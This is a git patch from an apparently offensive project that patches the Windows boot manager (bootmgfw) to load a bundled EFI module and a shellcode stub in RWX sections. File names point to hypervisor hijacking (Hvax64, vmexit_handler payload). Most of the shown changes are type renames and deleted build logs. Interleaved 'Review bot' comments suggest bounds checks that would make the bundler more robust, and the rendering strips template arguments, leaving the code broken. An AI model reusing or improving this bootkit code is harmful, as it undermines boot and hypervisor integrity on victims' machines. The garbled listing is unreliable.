From 5d44a71b7d33ead1a4e80dd0563f17ffd901a1c7 Mon Sep 17 00:00:00 2001 
From: xerox Date: Wed, 30 Sep 2020 21:12:15 -0700 Subject: [PATCH] idk what i added --- Efi Bundler/Efi Bundler.sln | 31 ++++ Efi Bundler/bundler.cpp | 12 +- Efi Bundler/bundler.h | 6 +- Efi Bundler/main.cpp | 4 +- Efi Bundler/shellcode.cpp | 12 +- Efi Bundler/utils.h | 10 +- Usermode Example/Example.sln | 31 ++++ .../Release/PayLoad(Intel).Build.CppClean.log | 13 -- .../x64/Release/PayLoad.Build.CppClean.log | 12 -- .../PayLoad/x64/Release/PayLoad.dll.recipe | 7 - Voyager-1/PayLoad/x64/Release/PayLoad.log | 7 - .../Release/PayLoad.tlog/CL.command.1.tlog | Bin 1450 -> 0 bytes .../x64/Release/PayLoad.tlog/CL.read.1.tlog | Bin 4132 -> 0 bytes .../x64/Release/PayLoad.tlog/CL.write.1.tlog | Bin 448 -> 0 bytes .../PayLoad.tlog/PayLoad.lastbuildstate | 2 - .../PayLoad.tlog/PayLoad.write.1u.tlog | Bin 400 -> 0 bytes .../Release/PayLoad.tlog/link.command.1.tlog | Bin 2200 -> 0 bytes .../x64/Release/PayLoad.tlog/link.read.1.tlog | Bin 1992 -> 0 bytes .../Release/PayLoad.tlog/link.write.1.tlog | Bin 298 -> 0 bytes Voyager-1/PayLoad/x64/Release/vc142.pdb | Bin 77824 -> 0 bytes .../PayLoad/x64/Release/vmexit_handler.obj | Bin 2743 -> 0 bytes Voyager-2/PayLoad/vmexit_handler.cpp | 13 +- Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c | 10 +- .../{Hvix64.c => Hvax64.c} | 69 ++++----- Voyager-2/Voyager-2 (2004-1709)/Hvax64.h | 35 +++++ Voyager-2/Voyager-2 (2004-1709)/Hvix64.h | 54 ------- Voyager-2/Voyager-2 (2004-1709)/PayLoad.c | 132 +++++++++--------- Voyager-2/Voyager-2 (2004-1709)/PayLoad.h | 6 +- Voyager-2/Voyager-2 (2004-1709)/UefiMain.c | 3 + .../Voyager-2 (2004-1709).vcxproj | 6 +- .../Voyager-2 (2004-1709).vcxproj.filters | 10 +- Voyager-2/Voyager-2 (2004-1709)/WinLoad.c | 17 +-- Voyager-2/Voyager-2 (2004-1709)/WinLoad.h | 2 +- 33 files changed, 244 insertions(+), 260 deletions(-) create mode 100644 Efi Bundler/Efi Bundler.sln create mode 100644 Usermode Example/Example.sln delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad(Intel).Build.CppClean.log delete mode 100644 
Voyager-1/PayLoad/x64/Release/PayLoad.Build.CppClean.log delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.dll.recipe delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.log delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/CL.command.1.tlog delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/CL.read.1.tlog delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/CL.write.1.tlog delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/PayLoad.lastbuildstate delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/PayLoad.write.1u.tlog delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/link.command.1.tlog delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/link.read.1.tlog delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/link.write.1.tlog delete mode 100644 Voyager-1/PayLoad/x64/Release/vc142.pdb delete mode 100644 Voyager-1/PayLoad/x64/Release/vmexit_handler.obj rename Voyager-2/Voyager-2 (2004-1709)/{Hvix64.c => Hvax64.c} (60%) create mode 100644 Voyager-2/Voyager-2 (2004-1709)/Hvax64.h delete mode 100644 Voyager-2/Voyager-2 (2004-1709)/Hvix64.h diff --git a/Efi Bundler/Efi Bundler.sln b/Efi Bundler/Efi Bundler.sln new file mode 100644 index 0000000..a0f17f7 --- /dev/null +++ b/Efi Bundler/Efi Bundler.sln 
@@ -0,0 +1,31 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.30503.244 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Efi Bundler", "Efi Bundler.vcxproj", "{EE860038-E3DD-4329-8D44-DF8B9ECBE420}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Debug|x64.ActiveCfg = Debug|x64 + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Debug|x64.Build.0 = Debug|x64 + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Debug|x86.ActiveCfg = Debug|Win32 + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Debug|x86.Build.0 = Debug|Win32 + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Release|x64.ActiveCfg = Release|x64 + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Release|x64.Build.0 = Release|x64 + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Release|x86.ActiveCfg = Release|Win32 + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {6F313696-ED35-4BFB-B825-E3E8861D12E3} + EndGlobalSection +EndGlobal diff --git a/Efi Bundler/bundler.cpp b/Efi Bundler/bundler.cpp index 71c482e..3d9dc6b 100644 --- a/Efi Bundler/bundler.cpp +++ b/Efi Bundler/bundler.cpp 
@@ -2,9 +2,9 @@ namespace bundler { - std::pair add_section(std::vector& image, const char* name, std::size_t size, std::u32_t protect) + std::pair add_section(std::vector& image, const char* name, std::size_t size, std::uint32_t protect) { - auto align = [](std::u32_t size, std::u32_t align, std::u32_t addr) -> std::u32_t + auto align = [](std::uint32_t size, std::uint32_t align, std::uint32_t addr) -> std::uint32_t { if (!(size % align)) return addr + size; @@ -12,7 +12,7 @@ namespace bundler }; auto section_header = reinterpret_cast( - ((u64)&NT_HEADER(image.data())->OptionalHeader) + + ((std::uint64_t)&NT_HEADER(image.data())->OptionalHeader) + NT_HEADER(image.data())->FileHeader.SizeOfOptionalHeader); auto new_section = §ion_header[NT_HEADER(image.data())->FileHeader.NumberOfSections]; @@ -51,12 +51,12 @@ namespace bundler } // module_base is .efi section base in this case... - std::u32_t map_module(std::u8_t* module_base, std::vector& map_from) + std::uint32_t map_module(std::uint8_t* module_base, std::vector& map_from) { // copy nt headers... memcpy(module_base, map_from.data(), NT_HEADER(map_from.data())->OptionalHeader.SizeOfHeaders); auto sections = reinterpret_cast( - (u8*)&NT_HEADER(map_from.data())->OptionalHeader + + (std::uint8_t*)&NT_HEADER(map_from.data())->OptionalHeader + NT_HEADER(map_from.data())->FileHeader.SizeOfOptionalHeader); // copy sections... @@ -69,7 +69,7 @@ namespace bundler return NT_HEADER(map_from.data())->OptionalHeader.AddressOfEntryPoint; } - void bundle(std::vector& bundle_into, std::vector& bundle_module) + void bundle(std::vector& bundle_into, std::vector& bundle_module) { auto [trp_section_disk, trp_section_virt] = add_section(bundle_into, ".trp", sizeof shellcode::stub, SECTION_RWX); auto [mod_section_disk, mod_section_virt] = add_section(bundle_into, ".efi", bundle_module.size(), SECTION_RWX); diff --git a/Efi Bundler/bundler.h b/Efi Bundler/bundler.h index 5f00b7b..986d710 100644 --- a/Efi Bundler/bundler.h 
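Review bot: `map_module` trusts every size it reads out of `map_from`: the `memcpy` copies `OptionalHeader.SizeOfHeaders` bytes and the section-table pointer is built from `SizeOfOptionalHeader`, but neither value, nor the `e_lfanew` that `NT_HEADER` adds unchecked, is ever compared against `map_from.size()`, and both inputs are files named on the command line, so a truncated or crafted module makes the copy read past the vector. Before the `memcpy`, check that `map_from.size()` covers `sizeof(IMAGE_DOS_HEADER)`, then `e_lfanew + sizeof(IMAGE_NT_HEADERS64)`, then `SizeOfHeaders`, and `return 0;` (documented as failure) when any of them does not; the per-section copy loop that follows is outside the hunk and needs the same treatment for `PointerToRawData + SizeOfRawData`. `add_section` in the first hunk has the same shape, taking `new_section` as `&section_header[NumberOfSections]` without confirming a free slot before the first section's raw data, though the code that fills it is outside the hunk. The template arguments of `std::vector` and `reinterpret_cast` are missing in this rendering, so the element types could not be verified here.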
+++ b/Efi Bundler/bundler.h @@ -9,7 +9,7 @@ namespace bundler { - std::pair add_section(std::vector& image, const char* name, std::size_t size, std::u32_t protect); - std::u32_t map_module(std::u8_t* module_base, std::vector& map_from); - void bundle(std::vector& bundle_into, std::vector& bundle_module); + std::pair add_section(std::vector& image, const char* name, std::size_t size, std::uint32_t protect); + std::uint32_t map_module(std::uint8_t* module_base, std::vector& map_from); + void bundle(std::vector& bundle_into, std::vector& bundle_module); } diff --git a/Efi Bundler/main.cpp b/Efi Bundler/main.cpp index 67b3936..172bff7 100644 --- a/Efi Bundler/main.cpp +++ b/Efi Bundler/main.cpp @@ -8,8 +8,8 @@ int __cdecl main(int argc, char** argv) return -1; } - std::vector efi_module; - std::vector bootmgfw; + std::vector efi_module; + std::vector bootmgfw; impl::open_binary_file(argv[1], bootmgfw); impl::open_binary_file(argv[2], efi_module); diff --git a/Efi Bundler/shellcode.cpp b/Efi Bundler/shellcode.cpp index 65eeafa..c1d6626 100644 --- a/Efi Bundler/shellcode.cpp +++ b/Efi Bundler/shellcode.cpp 
@@ -16,15 +16,15 @@ namespace shellcode auto reloc = reinterpret_cast(module_base + base_reloc_dir->VirtualAddress); for (auto current_size = 0u; current_size < base_reloc_dir->Size; ) { - std::u32_t reloc_count = (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(u16); - auto reloc_data = reinterpret_cast((u8*)reloc + sizeof(IMAGE_BASE_RELOCATION)); - auto reloc_base = reinterpret_cast(module_base) + reloc->VirtualAddress; + std::uint32_t reloc_count = (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(std::uint16_t); + auto reloc_data = reinterpret_cast((std::uint8_t*)reloc + sizeof(IMAGE_BASE_RELOCATION)); + auto reloc_base = reinterpret_cast(module_base) + reloc->VirtualAddress; for (auto i = 0u; i < reloc_count; ++i, ++reloc_data) { - std::u16_t data = *reloc_data; - std::u16_t type = data >> 12; - std::u16_t offset = data & 0xFFF; + std::uint16_t data = *reloc_data; + std::uint16_t type = data >> 12; + std::uint16_t offset = data & 0xFFF; switch (type) { diff --git a/Efi Bundler/utils.h b/Efi Bundler/utils.h index 86cc529..19f9f1c 100644 --- a/Efi Bundler/utils.h +++ b/Efi Bundler/utils.h @@ -15,12 +15,12 @@ #include #include -#define NT_HEADER(x) reinterpret_cast( u64_t(x) + reinterpret_cast(x)->e_lfanew ) +#define NT_HEADER(x) reinterpret_cast( std::uint64_t(x) + reinterpret_cast(x)->e_lfanew ) namespace impl { using uq_handle = std::unique_ptr; - __forceinline u32_t get_process_id(const std::wstring_view process_name) + __forceinline std::uint32_t get_process_id(const std::wstring_view process_name) { // open a system snapshot of all loaded processes uq_handle snap_shot{ CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0), &CloseHandle }; @@ -40,7 +40,7 @@ namespace impl return 0; } - __forceinline void open_binary_file(const std::string& file, std::vector& data) + __forceinline void open_binary_file(const std::string& file, std::vector& data) { std::ifstream fstr(file, std::ios::binary); fstr.unsetf(std::ios::skipws); 
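Review bot: `reloc_count` is computed as `(reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(std::uint16_t)` in unsigned arithmetic, so a block header whose `SizeOfBlock` is below 8 wraps to a huge count and the inner loop walks `reloc_data` far past the relocation directory; nothing in the hunk checks that `reloc` itself still lies inside `base_reloc_dir->Size` either. Guarding the header before the division, `if (reloc->SizeOfBlock < sizeof(IMAGE_BASE_RELOCATION) || current_size + reloc->SizeOfBlock > base_reloc_dir->Size) break;`, bounds both. How `current_size` and `reloc` advance is outside the hunk, so whether a zero `SizeOfBlock` would also stall the outer loop cannot be confirmed from here. The enclosing function starts and ends outside the hunk.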
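Review bot: `open_binary_file` never checks that `fstr` actually opened: with a path that does not exist, the `tellg()` in the next hunk (`@@ -49,8 +49,8 @@`) returns -1 and the `reserve(static_cast(file_size))` there asks for the maximum `size_t`, which surfaces as an uncaught `std::length_error` out of `main` rather than a usable error. Add `if (!fstr.is_open()) return;` directly after the `std::ifstream fstr(file, std::ios::binary);` line; since the function returns `void`, `main.cpp` cannot tell an empty file from a failed open, so returning `bool` and checking it at both `open_binary_file` calls in `main` would be the fuller fix. `NT_HEADER` in the same hunk adds the file-supplied `e_lfanew` with no bound, which a macro cannot validate itself, so that burden sits with its callers in bundler.cpp. Template arguments are missing from `static_cast`, `reinterpret_cast` and `std::vector` in this rendering.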
@@ -49,8 +49,8 @@ namespace impl const auto file_size = fstr.tellg(); fstr.seekg(NULL, std::ios::beg); - data.reserve(static_cast(file_size)); - data.insert(data.begin(), std::istream_iterator(fstr), std::istream_iterator()); + data.reserve(static_cast(file_size)); + data.insert(data.begin(), std::istream_iterator(fstr), std::istream_iterator()); } __forceinline bool enable_privilege(const std::wstring_view privilege_name) diff --git a/Usermode Example/Example.sln b/Usermode Example/Example.sln new file mode 100644 index 0000000..70996b7 --- /dev/null +++ b/Usermode Example/Example.sln 
@@ -0,0 +1,31 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.30503.244 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Example", "Example.vcxproj", "{09B41831-3164-48AD-8660-23457D82B73B}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {09B41831-3164-48AD-8660-23457D82B73B}.Debug|x64.ActiveCfg = Debug|x64 + {09B41831-3164-48AD-8660-23457D82B73B}.Debug|x64.Build.0 = Debug|x64 + {09B41831-3164-48AD-8660-23457D82B73B}.Debug|x86.ActiveCfg = Debug|Win32 + {09B41831-3164-48AD-8660-23457D82B73B}.Debug|x86.Build.0 = Debug|Win32 + {09B41831-3164-48AD-8660-23457D82B73B}.Release|x64.ActiveCfg = Release|x64 + {09B41831-3164-48AD-8660-23457D82B73B}.Release|x64.Build.0 = Release|x64 + {09B41831-3164-48AD-8660-23457D82B73B}.Release|x86.ActiveCfg = Release|Win32 + {09B41831-3164-48AD-8660-23457D82B73B}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {E132D109-7F0D-4125-B737-B5D83E6FBCA8} + EndGlobalSection +EndGlobal diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad(Intel).Build.CppClean.log b/Voyager-1/PayLoad/x64/Release/PayLoad(Intel).Build.CppClean.log deleted file mode 100644 index f02782a..0000000 --- a/Voyager-1/PayLoad/x64/Release/PayLoad(Intel).Build.CppClean.log +++ /dev/null 
@@ -1,13 +0,0 @@ -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\vc142.pdb -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\vmexit_handler.obj -c:\users\xerox\desktop\voyager\x64\release\payload(intel).dll -c:\users\xerox\desktop\voyager\x64\release\payload(intel).lib -c:\users\xerox\desktop\voyager\x64\release\payload(intel).exp -c:\users\xerox\desktop\voyager\x64\release\payload(intel).pdb -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\payload (intel).tlog\cl.command.1.tlog -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\payload (intel).tlog\cl.read.1.tlog -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\payload (intel).tlog\cl.write.1.tlog -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\payload (intel).tlog\link.command.1.tlog -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\payload (intel).tlog\link.read.1.tlog -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\payload (intel).tlog\link.write.1.tlog -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\payload (intel).tlog\payload (intel).write.1u.tlog diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.Build.CppClean.log b/Voyager-1/PayLoad/x64/Release/PayLoad.Build.CppClean.log deleted file mode 100644 index 7c0f721..0000000 --- a/Voyager-1/PayLoad/x64/Release/PayLoad.Build.CppClean.log +++ /dev/null 
@@ -1,12 +0,0 @@ -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\vc142.pdb -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\vmexit_handler.obj -c:\users\xerox\desktop\voyager\voyager-1\x64\release\payload.dll -c:\users\xerox\desktop\voyager\voyager-1\x64\release\payload.lib -c:\users\xerox\desktop\voyager\voyager-1\x64\release\payload.exp -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\payload.tlog\cl.command.1.tlog -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\payload.tlog\cl.read.1.tlog -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\payload.tlog\cl.write.1.tlog -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\payload.tlog\link.command.1.tlog -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\payload.tlog\link.read.1.tlog -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\payload.tlog\link.write.1.tlog -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\payload.tlog\payload.write.1u.tlog diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.dll.recipe b/Voyager-1/PayLoad/x64/Release/PayLoad.dll.recipe deleted file mode 100644 index 65cc69c..0000000 --- a/Voyager-1/PayLoad/x64/Release/PayLoad.dll.recipe +++ /dev/null @@ -1,7 +0,0 @@ - - - C:\Users\xerox\Desktop\voyager\Voyager-1\x64\Release\PayLoad.dll - - - - \ No newline at end of file diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.log b/Voyager-1/PayLoad/x64/Release/PayLoad.log deleted file mode 100644 index c4594d2..0000000 --- a/Voyager-1/PayLoad/x64/Release/PayLoad.log +++ /dev/null 
@@ -1,7 +0,0 @@ - Building 'PayLoad' with toolset 'WindowsKernelModeDriver10.0' and the 'Universal' target platform. - vmexit_handler.cpp - Creating library C:\Users\xerox\Desktop\voyager\Voyager-1\x64\Release\PayLoad.lib and object C:\Users\xerox\Desktop\voyager\Voyager-1\x64\Release\PayLoad.exp - PayLoad.vcxproj -> C:\Users\xerox\Desktop\voyager\Voyager-1\x64\Release\PayLoad.dll - Driver is 'Universal'. - Inf2Cat task was skipped as there were no inf files to process - diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/CL.command.1.tlog b/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/CL.command.1.tlog deleted file mode 100644 index 98fcd9443bb815825e3b439dff38b6a07891d338..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1450 zcmd6nU2hUm5QgX4#Q)HEOF*DlEr}N^TefQ{5U@a-jYL_B8-bFQ2KC3Q&&-}(il)6b z2sdqF(gurL{XW} z<1N1FriFH|+v76svD6DcU0(l|7{9YTRu-*#&9EcO$5V*RL#?=1&pyA9J2Li=eUF$A zz35$4c~kK6muU?;h4#W;*8a!W6ul?!@jJlp{`RNvnztPP%5Dgx?c~bk_>$-~UpKOG zu?18)t6U&?C2p}cS*gsaTSEQjjx|HSL-&Omr$oJdpueTUDc-cwn*&Bd&6oIDJ8i(L zvOBdyV(X5Qlz8WB^Vi11i%0u0!lrL%!+abyqQ`4=QC%u@x-ah>E0CYY-ob9rQ&l-W zIM-banf;V3ojkDXIgc^KqfhLS>m{G;k9q$QldDswQ(ePQ~^;oVJ3cg8dZP zK@-hTVq+Lfwy9-4K5QpS& z?wtoI@%OKvmf5`x)>&gu_Qrd#t&=L+!IsF4y;^IP)%1JXojusf>74h!*$kbU`JEML zKCoUoCE8odvGQ&&jIJ3koP`wpn&*pM9GGm-(|lzc$7ba$J+i7`W>4GFR_F}OS8!H; z4WmXM)vfms=XLbY6Yy0lr3#`nrHP|Do z<>?D+gyp#@N4KmPoYvgtNEtRev{M(`;)A#65p7^2TTkH6!4#)GUdsQEtCy}a#;X%* zLH>xnXDEIiTT%C;Dcn=$7qmCD>MJ|Sy>L_&8z(C|%3aEw@)H(Qc~iA{U*)Yw4ZjCe z0rermVLW{$o2mlshrva)MOJi=UVe6L$A});@4QoFKO1vgLye1R=BnBIx^gufCc@{~ zI*~%fc8sOdM7yjbqpDrW+QZW^_;;k=|3*He>ZXas|Cs2c_0=~GkEPpPJ=xG#Q+r!= zI1P4#r#;`&X*rDddr$R+-tA*V{h_q>gLAG97Uy%s79Yb_)fh3yJNSo@7^8yy YU+wYhbGo~Rys78Zk#2;_=9U5Jk^g@KY=(#f7`rijP(kT9p)n{{K(3-ptZPmr5Y>$j#i7Oyi4+9f=1$ z2RiMEXqi_`)XIAr?s$Ugr{aL)XqxYO#af!6^MO`Mr~6rRl{#|Pls6}JZ|b);p^$&j nTC(^7Nn}eYqE6n~-`T4(VI}gC4TV^0_J8M@`!O%RixGYRPD4Wo 
diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/PayLoad.lastbuildstate b/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/PayLoad.lastbuildstate deleted file mode 100644 index 197bfa6..0000000 --- a/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/PayLoad.lastbuildstate +++ /dev/null @@ -1,2 +0,0 @@ -PlatformToolSet=WindowsKernelModeDriver10.0:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.19041.0: -Release|x64|C:\Users\xerox\Desktop\voyager\Voyager-1\| diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/PayLoad.write.1u.tlog b/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/PayLoad.write.1u.tlog deleted file mode 100644 index 35e2fe5426d72e9bd685c4bbf56e02ac63bd9e6a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 400 zcmezWFOI>P!HOYu zSWOH=7z$sP!4Rk>04QI{-~*INWJtl_>jBM32AW*}v@M?@i-DJciw16}U@&7a0ook| dbY~6_CxZQl?lwK3TqZ-(0J|X-92%f-001mtOmYAK diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/link.command.1.tlog b/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/link.command.1.tlog deleted file mode 100644 index 6ac0c0efee8d0aaec5e22d0bdb600b121e27e244..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2200 zcmc(gYflqV5QgWoiT{D{84Hz4FNP0oX>sXgo8CzpNfDw(E`}n}Kd(OToZa3G2~n%r z?4CJu=JL+v%>MZP)~Z&ri4Cl0HS6-7*x0FKdK)x%=L zy{a1&*(C80c8W6tzsQni^6^CGGUf|?^4qkL^bcK0jT;3GTo~dbzhdQ{N&La4cEh~6a*F}iY7FwCNzzGj{C_9&q61ZFO&tB5gz3z4IOcmux7>S- z_x2jTY9Oh@IThkmr&ReDX&TB#sG;KRU^gavx@9%b>L<_74c{x@M_5!BDpw_+j72Lj zxpT}%P0>K@TYgRz6Y79_6;AVWx%^zWFxMzBb0znZC+n2#ralS@rL(|WruOlnIBsp0 z^vaBS-%{z4qtg`E`DZGBZtpm`hQ1@Z8IMjbpwI1#y(g33IJ-ns(o^h($ 
diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/link.read.1.tlog b/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/link.read.1.tlog deleted file mode 100644 index 30800205906f57523821a5008e617d025ee1e375..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1992 zcmdUw+fKqj5QgX4#CPCQFCZ7JG6?3MjF{Nl*1i*#&nc4-&e8!p&&;O6kntYZms;w@NTq2&pb zYfxtFj{F08tfs3Y-;wmlstz9Db&W7`R^L(cq@fjm2}c~2X@2>RT$)z@BVI};f7*9oFAVZ{J!iL)_bxVY)%J;t b<`3zUB9O^_)LE!4< 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 